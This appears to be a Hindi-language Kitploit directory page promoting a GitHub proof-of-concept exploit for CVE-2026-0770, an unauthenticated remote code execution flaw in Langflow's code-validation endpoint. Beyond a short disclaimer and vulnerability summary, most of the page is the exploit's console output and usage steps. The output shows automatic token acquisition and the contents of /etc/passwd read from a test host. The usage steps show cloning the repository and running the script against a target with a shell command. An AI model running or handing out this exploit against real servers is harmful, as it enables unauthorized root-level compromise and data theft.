Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-0770 — LangFlow RCE | CVE-2026-0770 | प्रमाण-अवधारणा | Kitploit
उपकरण/GitHubGitHub/ez4rd1x1/cve-2026-0770
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubez4rd1x1/cve-2026-0770

CVE-2026-0770

LangFlow RCE | CVE-2026-0770 | प्रमाण-अवधारणा

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-0770: Langflow exec_globals बिना प्रमाणीकरण के रिमोट कोड निष्पादन (PoC)

CVE Score: 9.8 Python Version

CVE-2026-0770 एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमजोरी है जो Langflow को प्रभावित करती है।

यह दोष /validate एंडपॉइंट को प्रदान किए गए exec_globals पैरामीटर के हैंडलिंग में अनुचित इनपुट सत्यापन से उत्पन्न होता है। इसका शोषण करके, एक हमलावर सत्यापन रूटीन के दौरान अविश्वसनीय वैश्विक वातावरण पास कर सकता है, जिससे root उपयोगकर्ता के संदर्भ में रिमोट कोड निष्पादन प्राप्त होता है।


[!] अस्वीकरण

चेतावनी: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण, शैक्षिक उद्देश्यों और रक्षात्मक शोध के लिए है। इसे उन लक्ष्यों पर न चलाएं जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट, लिखित अनुमति नहीं है। लेखक इस स्क्रिप्ट के दुरुपयोग या क्षति के लिए कोई दायित्व स्वीकार नहीं करता है।


कमजोरी का विवरण

  • CVE ID: CVE-2026-0770
  • कमजोरी का प्रकार: अविश्वसनीय नियंत्रण क्षेत्र से कार्यक्षमता का समावेश (CWE-829) / कोड इंजेक्शन
  • प्रभावित सॉफ्टवेयर: Langflow (पैच से पहले के संस्करण)
  • प्रभाव: पूर्ण सिस्टम समझौता (root के रूप में RCE)
  • आवश्यक विशेषाधिकार: कोई नहीं (बिना प्रमाणीकरण)

आउटपुट

root@kitploit:~

======================================================================
           Langflow RCE Exploit - CVE-2026-0770 - Zardy1x1            
======================================================================
Target : http://192.168.1.9:7860
Command: cat /etc/passwd
======================================================================
[*] attempt login...
[+] auto-login successful!
[~] token acquired: eyJhbGciOiJIUzI1NiIs...
[*] target command: cat /etc/passwd
[~] payload contructed
[~] sending request to http://192.168.1.9:7860/api/v1/validate/code
[*] receive status code: 200

======================================================================
COMMAND OUTPUT
======================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
user:x:1000:0::/app/data:/bin/sh
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:996:996:System Message Bus:/nonexistent:/usr/sbin/nologin
======================================================================

Status Code : 200
Response Size: 1244 bytes

स्थापना और उपयोग

root@kitploit:~
git clone https://github.com/Ez4rd1x1/CVE-2026-0770
cd CVE-2026-0770
python3 exp_v3.py -t http://target:port -c "cat /etc/passwd"
टूल डाउनलोड करें